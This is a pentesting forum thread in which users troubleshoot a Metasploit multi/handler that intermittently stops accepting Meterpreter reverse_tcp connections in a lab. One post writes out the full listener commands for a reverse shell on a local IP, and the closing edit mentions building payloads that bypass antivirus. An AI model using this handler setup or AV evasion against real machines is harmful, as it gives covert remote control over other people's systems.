Results 1 to 7 of 7

Thread: msfcli / msfconsole timouts

Hybrid View

  1. #1
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default msfcli / msfconsole timouts

    Just putting this out there, I dont think it is due to incorrect commands, yet I have seen it happen on several occasions, so your advice / information greatly appreciated.

    After having created and succesfully obtained a shell or a meterpreter reverse_tcp session, I have noticed that when closing the exploit and trying to start it up again, it seems to (on occasion) neglect connections.

    So it basically hangs at the stage of ;

    msf exploit(handler) > exploit
    Started reverse handler on 192.168.1.105:5632
    Starting the payload handler...

    This after having being able to use it before.

    If I then reboot backtrack, re-issue the same commands to listen for the incoming connection then
    all is fine and dandy and the shell / meterpreter works as it should, accepting connections.
    So I must be missing something, just not sure where to look.

    Any help greatly appreciated.

  2. #2
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: msfcli / msfconsole timouts

    Just to be sure, are you executing the payload on the victim again after setting up your listener?
    And just closing the terminal and restarting msfconsole doesn't affect it?

  3. #3
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: msfcli / msfconsole timouts

    That is correct.

    So starting the listner, executing the executable on victim PC.
    Getting the meterpreter session OK.

    After having done the testing I wanted, close it all down.

    Then after a while, restarting the process as above;
    >start listner
    >start payload on victim machine

    The payload handler never goes to the sending stage. Just stays on listening stage.


    Just looks like the handler is not correctly receiving.

    When restarting backtrack, all is good again.

    The problem is I have not been able to consistently reproduce this situation.
    Sometimes it happens sometimes it doesnt, so I was hoping it was something
    small I was missing, some kind of refreshing / reloading issue

    If I manage to figure out how to reproduce accurately I will post back.


    Thanks !

  4. #4
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: msfcli / msfconsole timouts

    You need to make sure that when you setup the listener that you are remembering to setup the proper IP and port. This would be my first guess as to why the problem you are experiencing is intermittent.

    If you are sure everything is correct and still experience issues you may want to try to flush your iptables. Also if you are getting an IP address via DHCP make sure your IP matches your payload.

    Do you have any other issues with your network connection after running the payload?

  5. #5
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: msfcli / msfconsole timouts

    Yep, very sure the commands are correct, I did another test today, using ./msfconsole
    Using (arrow up) to reissue the commands to ensure I was not making a simple typo.

    I tried with different EXITFUNCs as well which I hadnt last time.

    Basically all was hunky dory, had retried it at least 6 times, and all was good.
    With retrying I mean;
    Stopping meterpreter, the multi/handler and exiting msfconsole
    Ensuring the payload is no longer running on victim


    Then I left it for a while (+- 30/45min)
    then tried again and the same problem as before;
    Metasploit not responding to the syn packet being sent by victim.

    The listner started the same way as before in msfconsole;
    Code:
     
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp 
    set lhost 192.168.1.105
    set lport 5632 
    set exitfunc seh
    exploit
    reverse_tcp.exe of course only executed AFTER the multi/handler listening.


    Very strange, Internet is working normally on the IP, connection seems good.

    Might try to flush the iptables though and see if that helps.

    If I figure out what it is I will revert, but no ideas so far..


    Thanks for your answers and should you come up with any further ideas, please let me know !

  6. #6
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: msfcli / msfconsole timouts

    There is a lot more you can do to diagnose the issue.

    1. Create a new binary and run it on the victim machine. Try to make this one exactly as you made the last. (For diagnostic purposes I would check the hash before and after the file transfer to ensure no corruption is taking place.)

    2. Make a new binary payload and change the port. Make sure to use the updated port on your listener.

    3. Use a new payload. There are several different types of payloads and there are actually 2 types of reverse tcp payloads you can try.

    4. Try a new victim machine if you have one available. Let's make sure it is not the hardware that is causing this issue.

    5. (Optional) - Open up a packet sniffer and watch the packet flow during a successful attack and compare it to your unsuccessful attack. This usually works out best when you cut all LAN traffic down to a minimum. Only do this if you are comfortable with wireshark and packet reading.

    6. Double check metasploit's website for known bugs that may relate to this issue.

    7. Escalate the problem. Metasploit has a IRC chat channel or you can use their website to report a bug. Make sure to explain carefully all the steps you have taken to attempt to repair/diagnose the issue.
    Metasploit Penetration Testing Framework - Support

    When I have some extra time tonight I will also run a few payload tests on my end to see if I experience the same issue. You may want to hold off on step #7 at least until you can narrow the issue down.

  7. #7
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: msfcli / msfconsole timouts

    Thanks for your suggestions,


    The thing is that it all works great.
    Just sometimes after having tested it, and wanting to test again with a decent time limit in the middle, it doesnt seem to
    want to accept the connection from victim pc.

    I am pretty sure it has nothing to do with the executables, I always do a quick netstat on the victim PC to see whether it is actually sending anything.

    Have been able to reproduce the same problem on 3 systems. But for the life of me can't narrow it down to anything.

    When I have a bit more time I will try to do a more focussed and documented testing following (some of) your suggestions.

    Thanks again for the help !


    Edit
    -----
    Come to think of it, it may be an issue with my VM, but I am pretty sure I had the same thing on my BT4 netbook as well.

    I will make a couple of new exes and do some testing..

    Edit1
    ------
    At the moment creating payloads able to bypass AV, and have not been able to re-create the same error / non-response.

    Situation and issue remains on hold for the time being.
    Last edited by TAPE; 06-10-2010 at 03:06 PM.

Similar Threads

  1. msfconsole and audit trails
    By 18436572 in forum Beginners Forum
    Replies: 0
    Last Post: 02-22-2010, 07:41 PM
  2. Metasploit 3.3 - MsfConsole
    By regedit in forum OLD Newbie Area
    Replies: 0
    Last Post: 01-22-2010, 11:06 AM
  3. Metasploit 3.3 - MsfConsole
    By regedit in forum Angolo dei Newbie
    Replies: 0
    Last Post: 01-21-2010, 07:53 PM
  4. msfcli
    By thwak in forum OLD Pentesting
    Replies: 0
    Last Post: 01-18-2010, 01:48 PM
  5. msfcli cannot load "listening" exploit?
    By bruk0ut in forum OLD BT4beta Bugs and Fixes
    Replies: 8
    Last Post: 03-10-2009, 07:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •